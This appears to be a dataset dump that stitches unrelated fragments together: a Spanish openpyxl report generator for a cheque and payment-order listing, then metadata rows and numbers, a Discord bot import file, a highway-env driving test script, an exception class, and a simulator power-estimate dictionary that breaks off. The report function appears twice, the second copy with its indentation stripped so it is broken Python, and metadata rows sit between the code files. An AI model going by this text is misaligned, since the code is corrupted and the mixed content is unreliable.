    poner_border(sheet,1,5,'none','medium','none','none')
    poner_border(sheet,1,5,'none','medium','none','none')  # (duplicate call in original, kept as-is)
    poner_border(sheet,1,6,'none','medium','none','none')
    poner_border(sheet,1,7,'none','medium','none','none')
    poner_border(sheet,1,8,'none','medium','none','none')
    poner_border(sheet,1,9,'none','medium','medium','none')
    poner_border(sheet,2,1,'medium','none','none','none')
    poner_border(sheet,2,9,'none','none','medium','none')
    poner_border(sheet,3,1,'medium','none','none','medium')
    poner_border(sheet,3,2,'none','none','none','medium')
    poner_border(sheet,3,3,'none','none','none','medium')
    poner_border(sheet,3,4,'none','none','none','medium')
    poner_border(sheet,3,5,'none','none','none','medium')
    poner_border(sheet,3,6,'none','none','none','medium')
    poner_border(sheet,3,7,'none','none','none','medium')
    poner_border(sheet,3,8,'none','none','none','medium')
    poner_border(sheet,3,9,'none','none','medium','medium')
    # Date-range banner (D3:F3).  fecha_ini/fecha_fin/fecha are computed
    # but unused below (kept as in the original).
    fecha_ini=dic['fecha_desde']
    fecha_fin=dic['fecha_hasta']
    fecha=str(" Desde: "+dic['fecha_desde']+" Hasta: "+dic['fecha_hasta'])
    sheet.merge_cells('D3:F3')
    sheet['D3'].alignment = alignment_title.copy(wrapText=True,horizontal='center', vertical='top')
    sheet['D3'].font = fuente2
    sheet['D3']= str(" Desde: "+dic['fecha_desde']+" Hasta: "+dic['fecha_hasta'])
    # Detail-table column headers (row 6).
    sheet['A6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['A6'].font = fuente2
    sheet['A6']= 'Fecha Emisión'
    sheet.merge_cells('B6:C6')
    sheet['B6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['B6'].font = fuente2
    sheet['B6']= 'Egreso #'
    sheet.merge_cells('D6:E6')
    sheet['D6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['D6'].font = fuente2
    sheet['D6']= 'Cheque #'
    sheet['F6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['F6'].font = fuente2
    sheet['F6']= 'Beneficiario'
    sheet.merge_cells('G6:H6')
    sheet['G6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['G6'].font = fuente2
    sheet['G6']= 'Observación'
    sheet['I6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['I6'].font = fuente2
    sheet['I6']= 'Valor'
    # Detail rows start at row 7.
    fila=7
    total_general=0.0
    saldo_general=0.0
    saldo=0.0
    total=0.0
    dic={}            # NOTE(review): shadows the parameter; nothing below reads it
    lista_datos=[]
    for recorrer in lista_alumnos:
        sheet['A'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
        sheet['A'+str(fila)].font = fuente
        sheet['A'+str(fila)]= recorrer['fecha_emision']
        #poner_border(sheet,fila,1,'none','none','none','medium')
        sheet.merge_cells('B'+str(fila)+':C'+str(fila))
        sheet['B'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
        sheet['B'+str(fila)].font = fuente
        if recorrer['egreso']==0:
            sheet['B'+str(fila)]= ""
        else:
            sheet['B'+str(fila)]= recorrer['egreso']
        sheet.merge_cells('D'+str(fila)+':E'+str(fila))
        sheet['D'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
        sheet['D'+str(fila)].font = fuente
        if recorrer['cheque']==0:
            sheet['D'+str(fila)]= ""
        else:
            sheet['D'+str(fila)]= recorrer['cheque']
        sheet['F'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
        sheet['F'+str(fila)].font = fuente
        sheet['F'+str(fila)]= recorrer['beneficiario']
        sheet.merge_cells('G'+str(fila)+':H'+str(fila))
        sheet['G'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
        sheet['G'+str(fila)].font = fuente
        if recorrer['observacion']==0:
            sheet['G'+str(fila)]= ""
        else:
            sheet['G'+str(fila)]= recorrer['observacion']
        sheet['I'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='right', vertical='top')
        sheet['I'+str(fila)].font = fuente
        # Swap separators to European style: 1,234.5 -> 1.234,5
        sheet['I'+str(fila)]= "{:,}".format(float(recorrer['valor'])).replace(',','~').replace('.',',').replace('~','.')
        total_general=total_general+float(recorrer['valor'])
        fila=fila+1
    # Grand-total row right after the last detail row.
    sheet['G'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['G'+str(fila)].font = fuente2
    sheet['G'+str(fila)]= 'TOTAL'
    sheet.merge_cells('H'+str(fila)+':I'+str(fila))
    sheet['H'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='right', vertical='top')
    sheet['H'+str(fila)].font = fuente2
    sheet['H'+str(fila)]= "{:,}".format(float(total_general)).replace(',','~').replace('.',',').replace('~','.')
    # Signature line for the user, five rows below the total.
    columnas_filas(sheet, 1, str(fila+5), 10.00)
    sheet.merge_cells('D'+str(fila+5)+':F'+str(fila+5))
    sheet['D'+str(fila+5)].alignment = alignment_title.copy(wrapText=True,horizontal='center', vertical='center')
    sheet['D'+str(fila+5)].font = fuente2
    sheet['D'+str(fila+5)]= usuario_id
    poner_border(sheet,fila+5,4,'none','thin','none','none')
    poner_border(sheet,fila+5,5,'none','thin','none','none')
    poner_border(sheet,fila+5,6,'none','thin','none','none')
def Informe_pdf(sheet, dic,lista_alumnos,cant_alumno,filtro,filtro1):
columnas_filas(sheet, 0, 'A', 10.00)
columnas_filas(sheet, 0, 'B', 5.00)
columnas_filas(sheet, 0, 'C', 10.00)
columnas_filas(sheet, 0, 'D', 7.00)
columnas_filas(sheet, 0, 'E', 1.00)
columnas_filas(sheet, 0, 'F', 12.00)
columnas_filas(sheet, 0, 'G', 10.00)
columnas_filas(sheet, 0, 'H', 10.00)
columnas_filas(sheet, 0, 'I', 7.00)
columnas_filas(sheet, 0, 'J', 10.00)
alignment_title = Alignment(horizontal='center', vertical='center')
fuente = Font(bold=False, size=6, name='arial')
fuente3 = Font(bold=True, size=8, name='arial')
fuente2 = Font(bold=True, size=6, name='arial')
fila = 3
fila1 = 2
acum=1
cont=0
col=2
col1=4
fil=4
coli=2
colf=2
sheet.merge_cells('A2:I2')
sheet['A2'].alignment = alignment_title.copy(wrapText=True,horizontal='center', vertical='top')
sheet['A2'].font = fuente3
sheet['A2']= 'Listado de Cheques y Ordenes de Pago'
sheet['H1'].alignment = alignment_title.copy(wrapText=True,horizontal='right', vertical='top')
sheet['H1'].font = fuente2
sheet['H1']= 'Usuario'
usuario_id=str(dic['usuario_id'].encode('utf-8'))
sheet['I1'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['I1'].font = fuente
sheet['I1']= str(dic['usuario_id'].encode('utf-8'))
sheet['A1'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A1'].font = fuente2
sheet['A1']= 'Compañia'
sheet.merge_cells('B1:C1')
sheet['B1'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B1'].font = fuente
sheet['B1']= str(dic['company_id'].encode('utf-8'))
sheet['A4'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A4'].font = fuente2
sheet['A4']= 'Fecha Emisión:'
#fecha_actual = datetime.strftime(datetime.now(), '%d-%m-%Y %H:%M:%S')
fecha_actual = dic['fecha_corte']
sheet.merge_cells('B4:C4')
sheet['B4'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B4'].font = fuente
sheet['B4']= fecha_actual
sheet['A5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A5'].font = fuente2
sheet['A5']= 'Metodos de Pagos:'
sheet.merge_cells('B5:E5')
sheet['B5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B5'].font = fuente
if filtro==0:
sheet['B5']= "Todos los metodos de pagos"
else:
sheet['B5']= filtro
sheet['F5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['F5'].font = fuente2
sheet['F5']= 'Estados de Pagos:'
sheet.merge_cells('G5:G5')
sheet['G5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['G5'].font = fuente
if filtro1==0:
sheet['G5']= "Todos"
else:
sheet['G5']= filtro1
poner_border(sheet,1,1,'medium','medium','none','none')
poner_border(sheet,1,2,'none','medium','none','none')
poner_border(sheet,1,3,'none','medium','none','none')
poner_border(sheet,1,4,'none','medium','none','none')
poner_border(sheet,1,5,'none','medium','none','none')
poner_border(sheet,1,5,'none','medium','none','none')
poner_border(sheet,1,6,'none','medium','none','none')
poner_border(sheet,1,7,'none','medium','none','none')
poner_border(sheet,1,8,'none','medium','none','none')
poner_border(sheet,1,9,'none','medium','medium','none')
poner_border(sheet,2,1,'medium','none','none','none')
poner_border(sheet,2,9,'none','none','medium','none')
poner_border(sheet,3,1,'medium','none','none','medium')
poner_border(sheet,3,2,'none','none','none','medium')
poner_border(sheet,3,3,'none','none','none','medium')
poner_border(sheet,3,4,'none','none','none','medium')
poner_border(sheet,3,5,'none','none','none','medium')
poner_border(sheet,3,6,'none','none','none','medium')
poner_border(sheet,3,7,'none','none','none','medium')
poner_border(sheet,3,8,'none','none','none','medium')
poner_border(sheet,3,9,'none','none','medium','medium')
fecha_ini=dic['fecha_desde']
fecha_fin=dic['fecha_hasta']
fecha=str(" Desde: "+dic['fecha_desde']+" Hasta: "+dic['fecha_hasta'])
sheet.merge_cells('D3:F3')
sheet['D3'].alignment = alignment_title.copy(wrapText=True,horizontal='center', vertical='top')
sheet['D3'].font = fuente2
sheet['D3']= str(" Desde: "+dic['fecha_desde']+" Hasta: "+dic['fecha_hasta'])
sheet['A6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A6'].font = fuente2
sheet['A6']= 'Fecha Emisión'
sheet.merge_cells('B6:C6')
sheet['B6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B6'].font = fuente2
sheet['B6']= 'Egreso #'
sheet.merge_cells('D6:E6')
sheet['D6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['D6'].font = fuente2
sheet['D6']= 'Cheque #'
sheet['F6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['F6'].font = fuente2
sheet['F6']= 'Beneficiario'
sheet.merge_cells('G6:H6')
sheet['G6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['G6'].font = fuente2
sheet['G6']= 'Observación'
sheet['I6'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['I6'].font = fuente2
sheet['I6']= 'Valor'
fila=7
total_general=0.0
saldo_general=0.0
saldo=0.0
total=0.0
dic={}
lista_datos=[]
for recorrer in lista_alumnos:
sheet['A'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['A'+str(fila)].font = fuente
sheet['A'+str(fila)]= recorrer['fecha_emision']
#poner_border(sheet,fila,1,'none','none','none','medium')
sheet.merge_cells('B'+str(fila)+':C'+str(fila))
sheet['B'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['B'+str(fila)].font = fuente
if recorrer['egreso']==0:
sheet['B'+str(fila)]= ""
else:
sheet['B'+str(fila)]= recorrer['egreso']
sheet.merge_cells('D'+str(fila)+':E'+str(fila))
sheet['D'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['D'+str(fila)].font = fuente
if recorrer['cheque']==0:
sheet['D'+str(fila)]= ""
else:
sheet['D'+str(fila)]= recorrer['cheque']
sheet['F'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['F'+str(fila)].font = fuente
sheet['F'+str(fila)]= recorrer['beneficiario']
sheet.merge_cells('G'+str(fila)+':H'+str(fila))
sheet['G'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['G'+str(fila)].font = fuente
if recorrer['observacion']==0:
sheet['G'+str(fila)]= ""
else:
sheet['G'+str(fila)]= recorrer['observacion']
sheet['I'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='right', vertical='top')
sheet['I'+str(fila)].font = fuente
sheet['I'+str(fila)]= "{:,}".format(float(recorrer['valor'])).replace(',','~').replace('.',',').replace('~','.')
total_general=total_general+float(recorrer['valor'])
fila=fila+1
sheet['G'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
sheet['G'+str(fila)].font = fuente2
sheet['G'+str(fila)]= 'TOTAL'
sheet.merge_cells('H'+str(fila)+':I'+str(fila))
sheet['H'+str(fila)].alignment = alignment_title.copy(wrapText=True,horizontal='right', vertical='top')
sheet['H'+str(fila)].font = fuente2
sheet['H'+str(fila)]= "{:,}".format(float(total_general)).replace(',','~').replace('.',',').replace('~','.')
columnas_filas(sheet, 1, str(fila+5), 10.00)
sheet.merge_cells('D'+str(fila+5)+':F'+str(fila+5))
sheet['D'+str(fila+5)].alignment = alignment_title.copy(wrapText=True,horizontal='center', vertical='center')
sheet['D'+str(fila+5)].font = fuente2
sheet['D'+str(fila+5)]= usuario_id
poner_border(sheet,fila+5,4,'none','thin','none','none')
poner_border(sheet,fila+5,5,'none','thin','none','none')
poner_border(sheet,fila+5,6,'none','thin','none','none')
| 40.492481
| 140
| 0.642977
| 2,910
| 21,542
| 4.664261
| 0.078351
| 0.04229
| 0.091505
| 0.107419
| 0.92102
| 0.92102
| 0.912252
| 0.912252
| 0.912252
| 0.912252
| 0
| 0.028911
| 0.163448
| 21,542
| 531
| 141
| 40.568738
| 0.724266
| 0.056587
| 0
| 0.881517
| 0
| 0
| 0.130955
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021327
| false
| 0
| 0.035545
| 0
| 0.066351
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7a37c50e10d0df75ac16aa637a34d516b3dd4403
| 120
|
py
|
Python
|
olpxek_bot/cogs/__init__.py
|
kexplo/olpxek-bot
|
d4ec11d97ea906651a2df225081f33a235e9bd65
|
[
"MIT"
] | 7
|
2020-08-18T22:07:24.000Z
|
2022-01-01T07:32:20.000Z
|
olpxek_bot/cogs/__init__.py
|
kexplo/olpxek_bot
|
2fe5352ab1e584f877ba5445ff5af2d179c9b2c8
|
[
"MIT"
] | null | null | null |
olpxek_bot/cogs/__init__.py
|
kexplo/olpxek_bot
|
2fe5352ab1e584f877ba5445ff5af2d179c9b2c8
|
[
"MIT"
] | null | null | null |
from olpxek_bot.cogs.finance import FinanceCog
from olpxek_bot.cogs.py import PyCog
__all__ = ["FinanceCog", "PyCog"]
| 20
| 46
| 0.783333
| 17
| 120
| 5.176471
| 0.588235
| 0.227273
| 0.295455
| 0.386364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116667
| 120
| 5
| 47
| 24
| 0.830189
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7a8163b45e947b87b03c39c6279a130a163164b7
| 1,608
|
py
|
Python
|
lx_test/test_data.py
|
lxjlu/highway-env
|
b360ed3f4f7fca950294c82b04c55464624d5626
|
[
"MIT"
] | null | null | null |
lx_test/test_data.py
|
lxjlu/highway-env
|
b360ed3f4f7fca950294c82b04c55464624d5626
|
[
"MIT"
] | null | null | null |
lx_test/test_data.py
|
lxjlu/highway-env
|
b360ed3f4f7fca950294c82b04c55464624d5626
|
[
"MIT"
] | null | null | null |
import gym
import highway_env
import time
import pprint
import matplotlib.pyplot as plt
"""
# 直线
v_lane_id = ("a", "b", 1)
v_target_id = ("a", "b", 0)
x = 100.0
y = 0.0
h = 0.0
s = 10.0
target_s = 20.0
env = gym.make("myenv-c1-v0")
env.config["v_lane_id"] = v_lane_id
env.config["v_target_id"] = v_target_id
env.config["v_x"] = x
env.config["v_y"] = y
env.config["v_h"] = h
env.config["v_s"] = s
env.config["v_target_s"] = target_s
env.config["KP_HEADING"] = 1
env.config["KP_LATERAL"] = 0.8
env.reset()
env.vehicle.TAU_PURSUIT = env.config["TAU_PURSUIT"]
env.vehicle.KP_LATERAL = env.config["KP_LATERAL"]
env.vehicle.KP_A = env.config["KP_A"]
env.vehicle.KP_HEADING = env.config["KP_HEADING"]
for _ in range(50):
action = 1
env.step(action)
env.render()
time.sleep(0.5)
env.close()
"""
v_lane_id = ("a", "b", 1)
v_target_id = ("a", "b", 0)
x = 100.0
y = 0.0
h = 0.0
s = 10.0
target_s = 20.0
env = gym.make("myenv-c3-v0")
env.config["real_time_rendering"] = True
env.config["scaling"] = 6
env.config["v_lane_id"] = v_lane_id
env.config["v_target_id"] = v_target_id
env.config["v_x"] = x
env.config["v_y"] = y
env.config["v_h"] = h
env.config["v_s"] = s
env.config["v_target_s"] = target_s
env.config["KP_HEADING"] = 5
env.config["KP_LATERAL"] = 5
env.config["TAU_PURSUIT"] = 0.1
env.reset()
env.vehicle.TAU_PURSUIT = env.config["TAU_PURSUIT"]
env.vehicle.KP_LATERAL = env.config["KP_LATERAL"]
env.vehicle.KP_A = env.config["KP_A"]
env.vehicle.KP_HEADING = env.config["KP_HEADING"]
for _ in range(50):
action = 1
env.step(action)
env.render()
# time.sleep(0.5)
env.close()
| 22.333333
| 51
| 0.668532
| 308
| 1,608
| 3.275974
| 0.178571
| 0.258672
| 0.138751
| 0.047572
| 0.808722
| 0.808722
| 0.808722
| 0.808722
| 0.808722
| 0.808722
| 0
| 0.038905
| 0.136816
| 1,608
| 71
| 52
| 22.647887
| 0.68804
| 0.009328
| 0
| 0
| 0
| 0
| 0.170286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0.028571
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8fb0b79b8c69cb4e341e064aaeb00d8905f30df2
| 125
|
py
|
Python
|
exception/argument_not_instance_of_exception.py
|
joaoteixeira88/pyguard
|
e9bdcb58034fd0db254121f71ac9bd76c7dec973
|
[
"MIT"
] | 2
|
2021-03-11T22:09:40.000Z
|
2022-01-09T16:16:43.000Z
|
exception/argument_not_instance_of_exception.py
|
joaoteixeira88/pyguard
|
e9bdcb58034fd0db254121f71ac9bd76c7dec973
|
[
"MIT"
] | 3
|
2021-03-11T08:20:43.000Z
|
2021-03-30T07:34:38.000Z
|
exception/argument_not_instance_of_exception.py
|
joaoteixeira88/python-guard
|
e9bdcb58034fd0db254121f71ac9bd76c7dec973
|
[
"MIT"
] | null | null | null |
from exception.base_exception import BaseGuardException
class ArgumentNotInstanceOfException(BaseGuardException):
pass
| 20.833333
| 57
| 0.864
| 10
| 125
| 10.7
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104
| 125
| 5
| 58
| 25
| 0.955357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
8ff4604fc29bc4f2e89f58b37098b2cb0aeb5085
| 68,496
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_bzip2/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_bzip2/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_bzip2/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.367117,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.635715,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.3646,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.36743,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.36288,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.58889,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0133083,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0962357,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.098423,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0962357,
'Execution Unit/Register Files/Runtime Dynamic': 0.111731,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.232545,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.699999,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.78723,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.0025787,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.0025787,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00228506,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000905925,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00141385,
